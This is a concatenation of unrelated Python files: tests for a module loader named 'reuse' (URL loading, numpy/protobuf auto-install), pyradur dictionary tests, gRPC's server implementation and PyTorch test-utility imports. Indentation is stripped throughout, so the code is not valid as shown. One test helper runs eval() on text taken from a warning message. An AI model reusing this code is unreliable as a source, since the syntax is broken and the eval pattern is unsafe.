srcdir = Path(__file__).parent.parent.parent
if "tests.simple_funcs" in sys.modules:
del sys.modules["tests.simple_funcs"]
with ScopedCwd(srcdir):
mod = (
reuse(reuse.Path("./tests/simple_funcs.py"), package_name="tests")
@ (reuse.isfunction, "two", double_function)
)
assert mod.two() == 4
assert mod.three() == 3
assert reuse.ismethod
def test_aspectize_all_functions(reuse):
# all functions, but not classes or methods
srcdir = Path(__file__).parent.parent.parent
if "tests.simple_funcs" in sys.modules:
del sys.modules["tests.simple_funcs"]
with ScopedCwd(srcdir):
mod = (
reuse(reuse.Path("./tests/simple_funcs.py"), package_name="tests")
@ (reuse.isfunction, "", double_function)
)
assert mod.two() == 4
assert mod.three() == 6
inst = mod.Two()
assert inst() == 2
inst = mod.Three()
assert inst.three() == 3
def test_simple_url(reuse):
import http.server
port = 8089
orig_cwd = Path.cwd()
try:
os.chdir(Path(__file__).parent.parent.parent)
with http.server.HTTPServer(("", port), http.server.SimpleHTTPRequestHandler) as svr:
foo_uri = f"http://localhost:{port}/tests/.tests/foo.py"
print(f"starting thread to handle HTTP request on port {port}")
import threading
thd = threading.Thread(target=svr.handle_request)
thd.start()
print(f"loading foo module via use(URL({foo_uri}))")
with pytest.warns(use.NoValidationWarning):
mod = reuse(reuse.URL(foo_uri), initial_globals={"a": 42})
assert mod.test() == 42
finally:
os.chdir(orig_cwd)
def test_autoinstall_numpy_dual_version(reuse):
ver1, ver2 = "1.19.3", "1.19.5"
for ver in (ver1, ver2):
for k,v in list(sys.modules.items()):
if k == "numpy" or k.startswith("numpy."):
loader = (
getattr(v, "__loader__", None)
or v.__spec__.loader
)
if isinstance(loader, SourceFileLoader):
del sys.modules[k]
try:
mod = suggested_artifact(reuse, "numpy", version=ver)
assert mod
assert mod.__version__ == ver
except RuntimeError:
pass
def test_autoinstall_protobuf(reuse):
ver = "3.19.1"
mod = suggested_artifact(
reuse, "protobuf/google.protobuf", version=ver
)
assert mod.__version__ == ver
assert mod.__name__ == "google.protobuf"
assert (
tuple(Path(mod.__file__).parts[-3:])
== ("google", "protobuf", "__init__.py")
)
def suggested_artifact(reuse, *args, **kwargs):
reuse.pimp._clean_sys_modules(args[0].split("/")[-1].split(".")[0])
try:
mod = reuse(
*args,
modes=reuse.auto_install | reuse.Modes.fastfail,
**kwargs
)
return mod
except RuntimeWarning as rw:
last_line = str(rw).strip().splitlines()[-1].strip()
log.info("Usimg last line as suggested artifact: %s", repr(last_line))
last_line2 = last_line.replace("protobuf", "protobuf/google.protobuf")
mod = eval(last_line2)
log.info("suggest artifact returning: %s", mod)
return mod
|
test_pyradur.py
|
# MIT License
#
# Copyright (c) 2018-2019 Garmin International or its subsidiaries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from pyradur import Dict
from pyradur.db import Sqlite3DB
from pyradur.server import SockServer
import tempfile
import threading
import unittest
import shutil
import os
import logging
import sys
class CommonTests(object):
use_cache = True
close_on_cleanup = True
def _server_thread(self, event):
try:
self.server.db.add_db('var', Sqlite3DB(':memory:'))
event.set()
self.server.serve_forever()
# Process any outstanding events until the queue is empty
while self.server.handle_request():
pass
except Exception as e:
logging.exception('Server raised %s', e, exc_info=True)
finally:
# Close down the server. This prevents the main thread from being
# stuck blocking on a response from the server in the event that it
# has an exception
self.server.close()
def setUp(self):
root = logging.getLogger()
root.setLevel(logging.DEBUG)
self.handler = logging.StreamHandler(sys.stdout)
self.handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
self.handler.setFormatter(formatter)
root.addHandler(self.handler)
self.addCleanup(root.removeHandler, self.handler)
self.tempdir = tempfile.mkdtemp(prefix='pyradur-')
self.addCleanup(shutil.rmtree, self.tempdir, ignore_errors=True)
self.sock_path = os.path.join(self.tempdir, 'sock')
self.server = SockServer(self.sock_path)
self.sever_suspended = False
try:
event = threading.Event()
self.server_thread = threading.Thread(target=self._server_thread, args=[event])
self.server_thread.start()
event.wait()
self.addCleanup(self.check_server)
self.addCleanup(self.server_thread.join)
self.addCleanup(self.server.shutdown)
except Exception as e:
self.server.close()
raise e
def check_server(self):
# Check that all clients have disconnected
self.assertDictEqual(self.server.clients, {})
def get_dict(self, name, share_connection=True):
d = Dict(self.sock_path, name, use_cache=self.use_cache, share_connection=share_connection)
if self.close_on_cleanup:
self.addCleanup(lambda: d.close())
return d
def test_basic_get_set(self):
d = self.get_dict('var')
d['foo'] = 'bar'
self.assertEqual(d['foo'], 'bar')
with self.assertRaises(KeyError):
d['baz']
def test_get_set_shared(self):
a = self.get_dict('var')
b = self.get_dict('var')
a['foo'] = 'bar'
self.assertEqual(b['foo'], 'bar')
def test_get_set_nonshared(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertEqual(a.get('bat', 'baz'), 'baz')
a.sync()
self.assertFalse('baz' in b)
a.set('test', 'blah')
a.sync()
self.assertEqual(b['test'], 'blah')
def test_del_nonshared(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
del a['foo']
a.sync()
with self.assertRaises(KeyError):
b['foo']
def test_setdefault(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
self.assertEqual(a.setdefault('foo', 'bar'), 'bar')
a.sync()
self.assertEqual(b['foo'], 'bar')
def test_server_suspend(self):
a = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
with self.server.suspended():
a['foo'] = 'test'
a.sync()
self.assertEqual(a['foo'], 'test')
def test_contains(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertTrue('foo' in b)
self.assertFalse('bar' in b)
def test_cache_grow(self):
import mmap
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
count = mmap.PAGESIZE * 2
for i in range(count):
key = 'foo%d' % i
val = 'bar%d' % i
a[key] = val
self.assertEqual(a[key], val)
a.sync()
for i in range(count):
key = 'foo%d' % i
val = 'bar%d' % i
self.assertEqual(a[key], val)
self.assertEqual(b[key], val)
def test_missing_var(self):
a = self.get_dict('var')
with self.assertRaises(NameError):
b = self.get_dict('does-not-exist', share_connection=False)
with self.assertRaises(NameError):
b = self.get_dict('does-not-exist')
def test_var_factory(self):
def factory(name):
return Sqlite3DB(':memory:')
a = self.get_dict('var')
self.server.db.set_db_factory(factory)
b = self.get_dict('test1', share_connection=False)
c = self.get_dict('test2')
def test_cross_var(self):
def factory(name):
return Sqlite3DB(':memory:')
self.server.db.set_db_factory(factory)
a = self.get_dict('var', share_connection=False)
b = self.get_dict('test', share_connection=False)
a['foo'] = 'bar'
a.sync()
with self.assertRaises(KeyError):
b['foo']
b['foo'] = 'baz'
b.sync()
self.assertEqual(a['foo'], 'bar')
self.assertEqual(b['foo'], 'baz')
class NoCacheTests(CommonTests, unittest.TestCase):
use_cache = False
def test_cached(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertFalse(b.is_cached('foo'))
self.assertFalse(b.is_cached('not-present'))
a['foo'] = 'test'
b.invalidate('foo')
self.assertFalse(b.is_cached('foo'))
a.sync()
self.assertEqual(b['foo'], 'test')
def test_invalidate_all(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertFalse(b.is_cached('foo'))
with self.server.suspended():
a['foo'] = 'test'
b.invalidate_all()
self.assertFalse(b.is_cached('foo'))
a.sync()
self.assertEqual(b['foo'], 'test')
class CacheTests(CommonTests, unittest.TestCase):
def test_cached(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertTrue(b.is_cached('foo'))
self.assertFalse(b.is_cached('not-present'))
with self.server.suspended():
a['foo'] = 'test'
self.assertEqual(b['foo'], 'bar')
b.invalidate('foo')
self.assertFalse(b.is_cached('foo'))
a.sync()
self.assertEqual(b['foo'], 'test')
def test_invalidate_all(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertTrue(b.is_cached('foo'))
with self.server.suspended():
a['foo'] = 'test'
self.assertEqual(b['foo'], 'bar')
b.invalidate_all()
self.assertFalse(b.is_cached('foo'))
a.sync()
self.assertEqual(b['foo'], 'test')
class ImplicitCloseTests(CacheTests):
close_on_cleanup = False
def test_close(self):
a = self.get_dict('var')
b = self.get_dict('var', share_connection=False)
c = self.get_dict('var')
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertEqual(c['foo'], 'bar')
a.close()
c['baz'] = 'bat'
c.sync()
self.assertEqual(b['baz'], 'bat')
del c
del a
b['test'] = 'blah'
|
_server.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
import six
import grpc
from grpc import _common
from grpc import _interceptor
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
'send_initial_metadata * send_status_from_server')
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'
_EMPTY_FLAGS = 0
_UNEXPECTED_EXIT_SERVER_GRACE = 1.0
def _serialized_request(request_event):
return request_event.batch_operations[0].message()
def _application_code(code):
cygrpc_code = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
return cygrpc.StatusCode.unknown if cygrpc_code is None else cygrpc_code
def _completion_code(state):
if state.code is None:
return cygrpc.StatusCode.ok
else:
return _application_code(state.code)
def _abortion_code(state, code):
if state.code is None:
return code
else:
return _application_code(state.code)
def _details(state):
return b'' if state.details is None else state.details
class _HandlerCallDetails(
collections.namedtuple('_HandlerCallDetails', (
'method',
'invocation_metadata',
)), grpc.HandlerCallDetails):
pass
class _RPCState(object):
def __init__(self):
self.condition = threading.Condition()
self.due = set()
self.request = None
self.client = _OPEN
self.initial_metadata_allowed = True
self.disable_next_compression = False
self.trailing_metadata = None
self.code = None
self.details = None
self.statused = False
self.rpc_errors = []
self.callbacks = []
self.abortion = None
def _raise_rpc_error(state):
rpc_error = grpc.RpcError()
state.rpc_errors.append(rpc_error)
raise rpc_error
def _possibly_finish_call(state, token):
state.due.remove(token)
if (state.client is _CANCELLED or state.statused) and not state.due:
callbacks = state.callbacks
state.callbacks = None
return state, callbacks
else:
return None, ()
def _send_status_from_server(state, token):
def send_status_from_server(unused_send_status_from_server_event):
with state.condition:
return _possibly_finish_call(state, token)
return send_status_from_server
def _abort(state, call, code, details):
if state.client is not _CANCELLED:
effective_code = _abortion_code(state, code)
effective_details = details if state.details is None else state.details
if state.initial_metadata_allowed:
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, effective_code, effective_details,
_EMPTY_FLAGS),
)
token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
else:
operations = (cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, effective_code, effective_details,
_EMPTY_FLAGS),)
token = _SEND_STATUS_FROM_SERVER_TOKEN
call.start_server_batch(operations,
_send_status_from_server(state, token))
state.statused = True
state.due.add(token)
def _receive_close_on_server(state):
def receive_close_on_server(receive_close_on_server_event):
with state.condition:
if receive_close_on_server_event.batch_operations[0].cancelled():
state.client = _CANCELLED
elif state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)
return receive_close_on_server
def _receive_message(state, call, request_deserializer):
def receive_message(receive_message_event):
serialized_request = _serialized_request(receive_message_event)
if serialized_request is None:
with state.condition:
if state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
else:
request = _common.deserialize(serialized_request,
request_deserializer)
with state.condition:
if request is None:
_abort(state, call, cygrpc.StatusCode.internal,
b'Exception deserializing request!')
else:
state.request = request
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
return receive_message
def _send_initial_metadata(state):
def send_initial_metadata(unused_send_initial_metadata_event):
with state.condition:
return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)
return send_initial_metadata
def _send_message(state, token):
def send_message(unused_send_message_event):
with state.condition:
state.condition.notify_all()
return _possibly_finish_call(state, token)
return send_message
class _Context(grpc.ServicerContext):
def __init__(self, rpc_event, state, request_deserializer):
self._rpc_event = rpc_event
self._state = state
self._request_deserializer = request_deserializer
def is_active(self):
with self._state.condition:
return self._state.client is not _CANCELLED and not self._state.statused
def time_remaining(self):
return max(
float(self._rpc_event.call_details.deadline) - time.time(), 0)
def cancel(self):
self._rpc_event.call.cancel()
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def disable_next_message_compression(self):
with self._state.condition:
self._state.disable_next_compression = True
def invocation_metadata(self):
return self._rpc_event.invocation_metadata
def peer(self):
return _common.decode(self._rpc_event.call.peer())
def peer_identities(self):
return cygrpc.peer_identities(self._rpc_event.call)
def peer_identity_key(self):
id_key = cygrpc.peer_identity_key(self._rpc_event.call)
return id_key if id_key is None else _common.decode(id_key)
def auth_context(self):
return {
_common.decode(key): value
for key, value in six.iteritems(
cygrpc.auth_context(self._rpc_event.call))
}
def send_initial_metadata(self, initial_metadata):
with self._state.condition:
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
else:
if self._state.initial_metadata_allowed:
operation = cygrpc.SendInitialMetadataOperation(
initial_metadata, _EMPTY_FLAGS)
self._rpc_event.call.start_server_batch(
(operation,), _send_initial_metadata(self._state))
self._state.initial_metadata_allowed = False
self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
else:
raise ValueError('Initial metadata no longer allowed!')
def set_trailing_metadata(self, trailing_metadata):
with self._state.condition:
self._state.trailing_metadata = trailing_metadata
def abort(self, code, details):
with self._state.condition:
self._state.code = code
self._state.details = _common.encode(details)
self._state.abortion = Exception()
raise self._state.abortion
def set_code(self, code):
with self._state.condition:
self._state.code = code
def set_details(self, details):
with self._state.condition:
self._state.details = _common.encode(details)
class _RequestIterator(object):
def __init__(self, state, call, request_deserializer):
self._state = state
self._call = call
self._request_deserializer = request_deserializer
def _raise_or_start_receive_message(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif self._state.client is _CLOSED or self._state.statused:
raise StopIteration()
else:
self._call.start_server_batch(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
_receive_message(self._state, self._call,
self._request_deserializer))
self._state.due.add(_RECEIVE_MESSAGE_TOKEN)
def _look_for_request(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif (self._state.request is None and
_RECEIVE_MESSAGE_TOKEN not in self._state.due):
raise StopIteration()
else:
request = self._state.request
self._state.request = None
return request
def _next(self):
with self._state.condition:
self._raise_or_start_receive_message()
while True:
self._state.condition.wait()
request = self._look_for_request()
if request is not None:
return request
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def _unary_request(rpc_event, state, request_deserializer):
def unary_request():
with state.condition:
if state.client is _CANCELLED or state.statused:
return None
else:
rpc_event.call.start_server_batch(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
_receive_message(state, rpc_event.call,
request_deserializer))
state.due.add(_RECEIVE_MESSAGE_TOKEN)
while True:
state.condition.wait()
if state.request is None:
if state.client is _CLOSED:
details = '"{}" requires exactly one request message.'.format(
rpc_event.call_details.method)
_abort(state, rpc_event.call,
cygrpc.StatusCode.unimplemented,
_common.encode(details))
return None
elif state.client is _CANCELLED:
return None
else:
request = state.request
state.request = None
return request
return unary_request
def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return behavior(argument, context), True
except Exception as exception: # pylint: disable=broad-except
with state.condition:
if exception is state.abortion:
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
b'RPC Aborted')
elif exception not in state.rpc_errors:
details = 'Exception calling application: {}'.format(exception)
logging.exception(details)
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
_common.encode(details))
return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return next(response_iterator), True
except StopIteration:
return None, True
except Exception as exception: # pylint: disable=broad-except
with state.condition:
if exception is state.abortion:
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
b'RPC Aborted')
elif exception not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(exception)
logging.exception(details)
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
_common.encode(details))
return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
serialized_response = _common.serialize(response, response_serializer)
if serialized_response is None:
with state.condition:
_abort(state, rpc_event.call, cygrpc.StatusCode.internal,
b'Failed to serialize response!')
return None
else:
return serialized_response
def _send_response(rpc_event, state, serialized_response):
with state.condition:
if state.client is _CANCELLED or state.statused:
return False
else:
if state.initial_metadata_allowed:
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.SendMessageOperation(serialized_response,
_EMPTY_FLAGS),
)
state.initial_metadata_allowed = False
token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
else:
operations = (cygrpc.SendMessageOperation(
serialized_response, _EMPTY_FLAGS),)
token = _SEND_MESSAGE_TOKEN
rpc_event.call.start_server_batch(operations,
_send_message(state, token))
state.due.add(token)
while True:
state.condition.wait()
if token not in state.due:
return state.client is not _CANCELLED and not state.statused
def _status(rpc_event, state, serialized_response):
with state.condition:
if state.client is not _CANCELLED:
code = _completion_code(state)
details = _details(state)
operations = [
cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, code, details, _EMPTY_FLAGS),
]
if state.initial_metadata_allowed:
operations.append(
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS))
if serialized_response is not None:
operations.append(
cygrpc.SendMessageOperation(serialized_response,
_EMPTY_FLAGS))
rpc_event.call.start_server_batch(
operations,
_send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
state.statused = True
state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = _call_behavior(rpc_event, state, behavior, argument,
request_deserializer)
if proceed:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response_iterator, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_status(rpc_event, state, None)
break
else:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
proceed = _send_response(rpc_event, state,
serialized_response)
if not proceed:
break
else:
break
else:
break
def _handle_unary_unary(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
return thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.unary_unary, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
return thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.unary_stream, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.call,
method_handler.request_deserializer)
return thread_pool.submit(
_unary_response_in_pool, rpc_event, state, method_handler.stream_unary,
lambda: request_iterator, method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.call,
method_handler.request_deserializer)
return thread_pool.submit(
_stream_response_in_pool, rpc_event, state,
method_handler.stream_stream, lambda: request_iterator,
method_handler.request_deserializer, method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers, interceptor_pipeline):
def query_handlers(handler_call_details):
for generic_handler in generic_handlers:
method_handler = generic_handler.service(handler_call_details)
if method_handler is not None:
return method_handler
return None
handler_call_details = _HandlerCallDetails(
_common.decode(rpc_event.call_details.method),
rpc_event.invocation_metadata)
if interceptor_pipeline is not None:
return interceptor_pipeline.execute(query_handlers,
handler_call_details)
else:
return query_handlers(handler_call_details)
def _reject_rpc(rpc_event, status, details):
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),
cygrpc.SendStatusFromServerOperation(None, status, details,
_EMPTY_FLAGS),
)
rpc_state = _RPCState()
rpc_event.call.start_server_batch(operations,
lambda ignored_event: (rpc_state, (),))
return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
state = _RPCState()
with state.condition:
rpc_event.call.start_server_batch(
(cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),),
_receive_close_on_server(state))
state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
if method_handler.request_streaming:
if method_handler.response_streaming:
return state, _handle_stream_stream(rpc_event, state,
method_handler, thread_pool)
else:
return state, _handle_stream_unary(rpc_event, state,
method_handler, thread_pool)
else:
if method_handler.response_streaming:
return state, _handle_unary_stream(rpc_event, state,
method_handler, thread_pool)
else:
return state, _handle_unary_unary(rpc_event, state,
method_handler, thread_pool)
def _handle_call(rpc_event, generic_handlers, interceptor_pipeline, thread_pool,
concurrency_exceeded):
if not rpc_event.success:
return None, None
if rpc_event.call_details.method is not None:
try:
method_handler = _find_method_handler(rpc_event, generic_handlers,
interceptor_pipeline)
except Exception as exception: # pylint: disable=broad-except
details = 'Exception servicing handler: {}'.format(exception)
logging.exception(details)
return _reject_rpc(rpc_event, cygrpc.StatusCode.unknown,
b'Error in service handler!'), None
if method_handler is None:
return _reject_rpc(rpc_event, cygrpc.StatusCode.unimplemented,
b'Method not found!'), None
elif concurrency_exceeded:
return _reject_rpc(rpc_event, cygrpc.StatusCode.resource_exhausted,
b'Concurrent RPC limit exceeded!'), None
else:
return _handle_with_method_handler(rpc_event, method_handler,
thread_pool)
else:
return None, None
@enum.unique
class _ServerStage(enum.Enum):
STOPPED = 'stopped'
STARTED = 'started'
GRACE = 'grace'
class _ServerState(object):
# pylint: disable=too-many-arguments
def __init__(self, completion_queue, server, generic_handlers,
interceptor_pipeline, thread_pool, maximum_concurrent_rpcs):
self.lock = threading.RLock()
self.completion_queue = completion_queue
self.server = server
self.generic_handlers = list(generic_handlers)
self.interceptor_pipeline = interceptor_pipeline
self.thread_pool = thread_pool
self.stage = _ServerStage.STOPPED
self.shutdown_events = None
self.maximum_concurrent_rpcs = maximum_concurrent_rpcs
self.active_rpc_count = 0
# TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
self.rpc_states = set()
self.due = set()
def _add_generic_handlers(state, generic_handlers):
with state.lock:
state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
with state.lock:
return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
with state.lock:
return state.server.add_http2_port(address,
server_credentials._credentials)
def _request_call(state):
state.server.request_call(state.completion_queue, state.completion_queue,
_REQUEST_CALL_TAG)
state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
if not state.rpc_states and not state.due:
for shutdown_event in state.shutdown_events:
shutdown_event.set()
state.stage = _ServerStage.STOPPED
return True
else:
return False
def _on_call_completed(state):
with state.lock:
state.active_rpc_count -= 1
def _serve(state):
while True:
event = state.completion_queue.poll()
if event.tag is _SHUTDOWN_TAG:
with state.lock:
state.due.remove(_SHUTDOWN_TAG)
if _stop_serving(state):
return
elif event.tag is _REQUEST_CALL_TAG:
with state.lock:
state.due.remove(_REQUEST_CALL_TAG)
concurrency_exceeded = (
state.maximum_concurrent_rpcs is not None and
state.active_rpc_count >= state.maximum_concurrent_rpcs)
rpc_state, rpc_future = _handle_call(
event, state.generic_handlers, state.interceptor_pipeline,
state.thread_pool, concurrency_exceeded)
if rpc_state is not None:
state.rpc_states.add(rpc_state)
if rpc_future is not None:
state.active_rpc_count += 1
rpc_future.add_done_callback(
lambda unused_future: _on_call_completed(state))
if state.stage is _ServerStage.STARTED:
_request_call(state)
elif _stop_serving(state):
return
else:
rpc_state, callbacks = event.tag(event)
for callback in callbacks:
callable_util.call_logging_exceptions(
callback, 'Exception calling callback!')
if rpc_state is not None:
with state.lock:
state.rpc_states.remove(rpc_state)
if _stop_serving(state):
return
# We want to force the deletion of the previous event
# ~before~ we poll again; if the event has a reference
# to a shutdown Call object, this can induce spinlock.
event = None
def _stop(state, grace):
with state.lock:
if state.stage is _ServerStage.STOPPED:
shutdown_event = threading.Event()
shutdown_event.set()
return shutdown_event
else:
if state.stage is _ServerStage.STARTED:
state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
state.stage = _ServerStage.GRACE
state.shutdown_events = []
state.due.add(_SHUTDOWN_TAG)
shutdown_event = threading.Event()
state.shutdown_events.append(shutdown_event)
if grace is None:
state.server.cancel_all_calls()
else:
def cancel_all_calls_after_grace():
shutdown_event.wait(timeout=grace)
with state.lock:
state.server.cancel_all_calls()
thread = threading.Thread(target=cancel_all_calls_after_grace)
thread.start()
return shutdown_event
shutdown_event.wait()
return shutdown_event
def _start(state):
with state.lock:
if state.stage is not _ServerStage.STOPPED:
raise ValueError('Cannot start already-started server!')
state.server.start()
state.stage = _ServerStage.STARTED
_request_call(state)
def cleanup_server(timeout):
if timeout is None:
_stop(state, _UNEXPECTED_EXIT_SERVER_GRACE).wait()
else:
_stop(state, timeout).wait()
thread = _common.CleanupThread(
cleanup_server, target=_serve, args=(state,))
thread.start()
class Server(grpc.Server):
# pylint: disable=too-many-arguments
def __init__(self, thread_pool, generic_handlers, interceptors, options,
maximum_concurrent_rpcs):
completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server(_common.channel_args(options))
server.register_completion_queue(completion_queue)
self._state = _ServerState(completion_queue, server, generic_handlers,
_interceptor.service_pipeline(interceptors),
thread_pool, maximum_concurrent_rpcs)
def add_generic_rpc_handlers(self, generic_rpc_handlers):
_add_generic_handlers(self._state, generic_rpc_handlers)
def add_insecure_port(self, address):
return _add_insecure_port(self._state, _common.encode(address))
def add_secure_port(self, address, server_credentials):
return _add_secure_port(self._state, _common.encode(address),
server_credentials)
def start(self):
_start(self._state)
def stop(self, grace):
return _stop(self._state, grace)
def __del__(self):
_stop(self._state, None)
|
common_utils.py
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
import __main__ # type: ignore[import]
import errno
